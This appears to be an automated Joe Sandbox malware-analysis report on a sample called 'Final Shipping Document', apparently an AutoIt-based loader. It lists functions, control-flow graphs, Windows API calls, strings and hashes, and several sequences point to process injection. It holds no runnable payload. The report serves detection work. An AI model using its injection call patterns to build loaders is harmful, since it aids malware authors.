                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: f1a4f549b30cd9926737be490e783fd32bc2c464b33c2c5f08f3763e620db56d
                                                            • Instruction ID: fed6f469296af68d4a6d5b11d7fa5aeec69ba4551373413fec8a8a573b160c78
                                                            • Opcode Fuzzy Hash: f1a4f549b30cd9926737be490e783fd32bc2c464b33c2c5f08f3763e620db56d
                                                            • Instruction Fuzzy Hash: 4B413B3125C304ABDF145B7C9C8EB7D3AD9E747B40F0841A6FE0AA61A1CB71CE8097A1
                                                            Function 00BD8D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 499 bd8d45-bd8d55 500 bd8d6f-bd8d71 499->500 501 bd8d57-bd8d6a call bcf2c6 call bcf2d9 499->501 502 bd90d9-bd90e6 call bcf2c6 call bcf2d9 500->502 503 bd8d77-bd8d7d 500->503 515 bd90f1 501->515 520 bd90ec call bd27ec 502->520 503->502 505 bd8d83-bd8dae 503->505 505->502 509 bd8db4-bd8dbd 505->509 513 bd8dbf-bd8dd2 call bcf2c6 call bcf2d9 509->513 514 bd8dd7-bd8dd9 509->514 513->520 518 bd8ddf-bd8de3 514->518 519 bd90d5-bd90d7 514->519 521 bd90f4-bd90f9 515->521 518->519 523 bd8de9-bd8ded 518->523 519->521 520->515 523->513 526 bd8def-bd8e06 523->526 528 bd8e08-bd8e0b 526->528 529 bd8e23-bd8e2c 526->529 532 bd8e0d-bd8e13 528->532 533 bd8e15-bd8e1e 528->533 530 bd8e2e-bd8e45 call bcf2c6 call bcf2d9 call bd27ec 529->530 531 bd8e4a-bd8e54 529->531 564 bd900c 530->564 536 bd8e5b-bd8e79 call bd3820 call bd29c8 * 2 531->536 537 bd8e56-bd8e58 531->537 532->530 532->533 534 bd8ebf-bd8ed9 533->534 539 bd8fad-bd8fb6 call bdf89b 534->539 540 bd8edf-bd8eef 534->540 568 bd8e7b-bd8e91 call bcf2d9 call bcf2c6 536->568 569 bd8e96-bd8ebc call bd9424 536->569 537->536 551 bd9029 539->551 552 bd8fb8-bd8fca 539->552 540->539 544 bd8ef5-bd8ef7 540->544 544->539 548 bd8efd-bd8f23 544->548 548->539 553 bd8f29-bd8f3c 548->553 556 bd902d-bd9045 ReadFile 551->556 552->551 558 bd8fcc-bd8fdb GetConsoleMode 552->558 553->539 559 bd8f3e-bd8f40 553->559 562 bd9047-bd904d 556->562 563 bd90a1-bd90ac GetLastError 556->563 558->551 565 bd8fdd-bd8fe1 558->565 559->539 560 bd8f42-bd8f6d 559->560 560->539 567 bd8f6f-bd8f82 560->567 562->563 572 bd904f 562->572 570 bd90ae-bd90c0 call bcf2d9 call bcf2c6 563->570 571 bd90c5-bd90c8 563->571 566 bd900f-bd9019 call bd29c8 564->566 565->556 573 bd8fe3-bd8ffd ReadConsoleW 565->573 566->521 567->539 575 bd8f84-bd8f86 567->575 568->564 569->534 570->564 582 bd90ce-bd90d0 571->582 583 bd9005-bd900b call bcf2a3 571->583 579 bd9052-bd9064 572->579 580 bd8fff GetLastError 573->580 581 bd901e-bd9027 573->581 575->539 585 bd8f88-bd8fa8 575->585 579->566 589 bd9066-bd906a 579->589 580->583 581->579 582->566 583->564 585->539 593 bd906c-bd907c call bd8a61 589->593 594 bd9083-bd908e 589->594 606 bd907f-bd9081 593->606 599 bd909a-bd909f call bd88a1 594->599 600 bd9090 call bd8bb1 594->600 604 bd9095-bd9098 599->604 600->604 604->606 606->566
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4fa0f0b2f0ffcb2065b278545131bc96c7c236314d823359dd445e6c09c2ad21
                                                            • Instruction ID: 7295aff2e4bcdf2238edd0132d2a23a8bba2a8a2fee7f410a3fd238b7029ab40
                                                            • Opcode Fuzzy Hash: 4fa0f0b2f0ffcb2065b278545131bc96c7c236314d823359dd445e6c09c2ad21
                                                            • Instruction Fuzzy Hash: 96C1D274A04289AFDB11DFA8D881BADFBF5EF09310F1441DAF519AB392E7309941CB61
                                                            Function 015725F0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 607 15725f0-157269e call 1570000 610 15726a5-15726cb call 1573500 CreateFileW 607->610 613 15726d2-15726e2 610->613 614 15726cd 610->614 619 15726e4 613->619 620 15726e9-1572703 VirtualAlloc 613->620 615 157281d-1572821 614->615 616 1572863-1572866 615->616 617 1572823-1572827 615->617 621 1572869-1572870 616->621 622 1572833-1572837 617->622 623 1572829-157282c 617->623 619->615 624 1572705 620->624 625 157270a-1572721 ReadFile 620->625 626 15728c5-15728da 621->626 627 1572872-157287d 621->627 628 1572847-157284b 622->628 629 1572839-1572843 622->629 623->622 624->615 632 1572723 625->632 633 1572728-1572768 VirtualAlloc 625->633 636 15728dc-15728e7 VirtualFree 626->636 637 15728ea-15728f2 626->637 634 1572881-157288d 627->634 635 157287f 627->635 630 157284d-1572857 628->630 631 157285b 628->631 629->628 630->631 631->616 632->615 638 157276f-157278a call 1573750 633->638 639 157276a 633->639 640 15728a1-15728ad 634->640 641 157288f-157289f 634->641 635->626 636->637 647 1572795-157279f 638->647 639->615 644 15728af-15728b8 640->644 645 15728ba-15728c0 640->645 643 15728c3 641->643 643->621 644->643 645->643 648 15727d2-15727e6 call 1573560 647->648 649 15727a1-15727d0 call 1573750 647->649 654 15727ea-15727ee 648->654 655 15727e8 648->655 649->647 657 15727f0-15727f4 FindCloseChangeNotification 654->657 658 15727fa-15727fe 654->658 655->615 657->658 659 1572800-157280b VirtualFree 658->659 660 157280e-1572817 658->660 659->660 660->610 660->615
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015726C1
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 015728E7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2039525570.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1570000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                            • Instruction ID: 5003291eff22007650d71c6b19e4cb77b85bb760cde675b6c9f655f7bc650b31
                                                            • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                            • Instruction Fuzzy Hash: 08A13874E00209EBDB14CFA4D995BEEBBB5FF48304F208559E601BB281D7759A81CFA0
                                                            Function 00BA2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 671 ba2c63-ba2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BA2C91
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BA2CB2
                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BA1CAD,?), ref: 00BA2CC6
                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BA1CAD,?), ref: 00BA2CCF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: e08e79312e522d4f92d1a19ae9dda4c1b07f8d77cd68cb702dbfefb17566e9ed
                                                            • Instruction ID: a48c3de1440006b2c8658a92cfc95de2b1ba6c8dbf49228059e5364e3d3a646d
                                                            • Opcode Fuzzy Hash: e08e79312e522d4f92d1a19ae9dda4c1b07f8d77cd68cb702dbfefb17566e9ed
                                                            • Instruction Fuzzy Hash: CEF0B7755503907AEB211B2BAC49F7F2EBDD7C6F50F05405AFD08A25B0C6615890DAB0
                                                            Function 015723B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 786 15723b0-15724ec call 1570000 call 15722a0 CreateFileW 793 15724f3-1572503 786->793 794 15724ee 786->794 797 1572505 793->797 798 157250a-1572524 VirtualAlloc 793->798 795 15725a3-15725a8 794->795 797->795 799 1572526 798->799 800 1572528-157253f ReadFile 798->800 799->795 801 1572543-157257d call 15722e0 call 15712a0 800->801 802 1572541 800->802 807 157257f-1572594 call 1572330 801->807 808 1572599-15725a1 ExitProcess 801->808 802->795 807->808 808->795
                                                            APIs
                                                              • Part of subcall function 015722A0: Sleep.KERNELBASE(000001F4), ref: 015722B1
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015724E2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2039525570.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1570000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: 3L0AO6LKPQJ14FYBUT7LKAV800B
                                                            • API String ID: 2694422964-224596028
                                                            • Opcode ID: 074dd1ead4a0f02db99a2a3cd11ecd41d83b46ae1f24693a7e7ce0de674681cf
                                                            • Instruction ID: 93eeba8a66dc25855d6c263d5992cadfceba70170e9ace8ac6530fe69bb8452b
                                                            • Opcode Fuzzy Hash: 074dd1ead4a0f02db99a2a3cd11ecd41d83b46ae1f24693a7e7ce0de674681cf
                                                            • Instruction Fuzzy Hash: 78518170D04288EAEF12D7B4D859BDEBBB8AF15304F044189E6497B2C1D7B90B49CBA5
                                                            Function 00C12947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C12C05
                                                            • DeleteFileW.KERNEL32(?), ref: 00C12C87
                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C12C9D
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C12CAE
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C12CC0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$Copy
                                                            • String ID:
                                                            • API String ID: 3226157194-0
                                                            • Opcode ID: 59496e6ddbeaa9b50094b7534cae816cb40c50057998d62110f179e95ed37b93
                                                            • Instruction ID: bd187421c508937b840c64f8433b0d8881b8d8373cfcb53ef35fcc95b7bbad11
                                                            • Opcode Fuzzy Hash: 59496e6ddbeaa9b50094b7534cae816cb40c50057998d62110f179e95ed37b93
                                                            • Instruction Fuzzy Hash: 6FB16F75D00119ABDF21DBA4CC85EEEB7BDEF09350F1040AAF609E6141EB309B949FA1
                                                            Function 00BA3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 952 ba3b1c-ba3b27 953 ba3b99-ba3b9b 952->953 954 ba3b29-ba3b2e 952->954 956 ba3b8c-ba3b8f 953->956 954->953 955 ba3b30-ba3b48 RegOpenKeyExW 954->955 955->953 957 ba3b4a-ba3b69 RegQueryValueExW 955->957 958 ba3b6b-ba3b76 957->958 959 ba3b80-ba3b8b RegCloseKey 957->959 960 ba3b78-ba3b7a 958->960 961 ba3b90-ba3b97 958->961 959->956 962 ba3b7e 960->962 961->962 962->959
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00BA3B0F,SwapMouseButtons,00000004,?), ref: 00BA3B40
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00BA3B0F,SwapMouseButtons,00000004,?), ref: 00BA3B61
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00BA3B0F,SwapMouseButtons,00000004,?), ref: 00BA3B83
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: 49caf1a63d93ec09161174a6d7f9b2ec332523609fdd5cfde451a54102b63123
                                                            • Instruction ID: 0c6927233e4692cb64434c16aa44e2443da6f074418bf5b0aeb08b64548914fc
                                                            • Opcode Fuzzy Hash: 49caf1a63d93ec09161174a6d7f9b2ec332523609fdd5cfde451a54102b63123
                                                            • Instruction Fuzzy Hash: A5112AB5525208FFDB208FA5DC85AAEB7F9EF05B44B504499B805E7110D3319E4097A0
                                                            Function 015712A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 01571A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01571AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01571B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2039525570.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1570000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                            • Instruction ID: b6efa4fe91f41b0bd0d2c77ed84b64e6651258aa2e29c9aaa6fb900417819102
                                                            • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                            • Instruction Fuzzy Hash: 5A622A30A14658DBEB24CFA4D881BDEB772FF58300F1095A9D20DEB290E7759E81CB59
                                                            Function 00BADFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Variable must be of type 'Object'., xrefs: 00BF32B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable must be of type 'Object'.
                                                            • API String ID: 0-109567571
                                                            • Opcode ID: 8a951210a1c9c6d492563c4e9adea352d58ef798e8b583a8aebd59e987b6c6aa
                                                            • Instruction ID: 382387238894c04fe7f9a963349100f74c9b6c0fee14a15923caecc386f0806f
                                                            • Opcode Fuzzy Hash: 8a951210a1c9c6d492563c4e9adea352d58ef798e8b583a8aebd59e987b6c6aa
                                                            • Instruction Fuzzy Hash: 70C28A70A04215CFCB24CF58C880AADB7F1FF4A710F2485A9E926AB391D775ED85CB91
                                                            Function 00BA3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BE33A2
                                                              • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BA3A04
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                            • String ID: Line:
                                                            • API String ID: 2289894680-1585850449
                                                            • Opcode ID: f38900992add9bfb84e0b55fab700f512ff6fa5789edb3ba6d662f4647406c4a
                                                            • Instruction ID: bc1af932e88dc4e4eba3c59e283edf7264fb9ff1b7280e22c5e18049e9a22422
                                                            • Opcode Fuzzy Hash: f38900992add9bfb84e0b55fab700f512ff6fa5789edb3ba6d662f4647406c4a
                                                            • Instruction Fuzzy Hash: BB31D47140C304AEC725EB24DC46FEFB7E8AB42B10F0845AEF599930A1DB749648C7D6
                                                            Function 00BBFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0668
                                                              • Part of subcall function 00BC32A4: RaiseException.KERNEL32(?,?,?,00BC068A,?,00C71444,?,?,?,?,?,?,00BC068A,00BA1129,00C68738,00BA1129), ref: 00BC3304
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0685
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                            • String ID: Unknown exception
                                                            • API String ID: 3476068407-410509341
                                                            • Opcode ID: b8207ba0be40c2c61d871ba4bdf10d38eebc9eeb0d177ed9b3c284136d49cbc4
                                                            • Instruction ID: 806fa79cd8fadffe371e95eaee117b274694158504e1a5519fda6ae4af080b0d
                                                            • Opcode Fuzzy Hash: b8207ba0be40c2c61d871ba4bdf10d38eebc9eeb0d177ed9b3c284136d49cbc4
                                                            • Instruction Fuzzy Hash: 65F0FC3490020DF7CF10BA64DC86EAD77EC9E00710B6045F9B924D5591EF71DB5AC6D0
                                                            Function 00C13017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00C1302F
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C13044
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: a3bc9d102db2f1da93c4cd97f8cbb5a34591bb6ac25c66c52ef82d6adf212780
                                                            • Instruction ID: 5a07b95d4f2a66afda7ab29d3332e4e06308f160628ce0ec83b9cd509334dc80
                                                            • Opcode Fuzzy Hash: a3bc9d102db2f1da93c4cd97f8cbb5a34591bb6ac25c66c52ef82d6adf212780
                                                            • Instruction Fuzzy Hash: 5AD05EB250032867DA30A7A4AC8EFCF3A6CDB04750F0002A1BA55E2091DAB59984CBD0
                                                            Function 00C27F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C282F5
                                                            • TerminateProcess.KERNEL32(00000000), ref: 00C282FC
                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 00C284DD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                            • String ID:
                                                            • API String ID: 146820519-0
                                                            • Opcode ID: 13beab4a3d7b9b8e142ddbb8c422d257ed677be11b415484661607592e980648
                                                            • Instruction ID: f7ed40220d91022090ce5a1f1b738f169c89b3ced2a2b4a2d71399bc9ab508ed
                                                            • Opcode Fuzzy Hash: 13beab4a3d7b9b8e142ddbb8c422d257ed677be11b415484661607592e980648
                                                            • Instruction Fuzzy Hash: 70127C719083119FD714DF28D484B6ABBE1FF89318F04895DE8998B252CB31ED49CF92
                                                            Function 00BD5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 73721f3aa7ede0b81baf5642a6bae919def0cdee38a1aef1e1adabd1536ba49f
                                                            • Instruction ID: f7c454ec3ceb878cd7bd132df6b981b8d80bc70cd255905d1f68cf0b3bfeaa11
                                                            • Opcode Fuzzy Hash: 73721f3aa7ede0b81baf5642a6bae919def0cdee38a1aef1e1adabd1536ba49f
                                                            • Instruction Fuzzy Hash: 17517D7191060AABDB319FA8C885FAEFBF8EF45310F1800DBF405AB391E6719941DB61
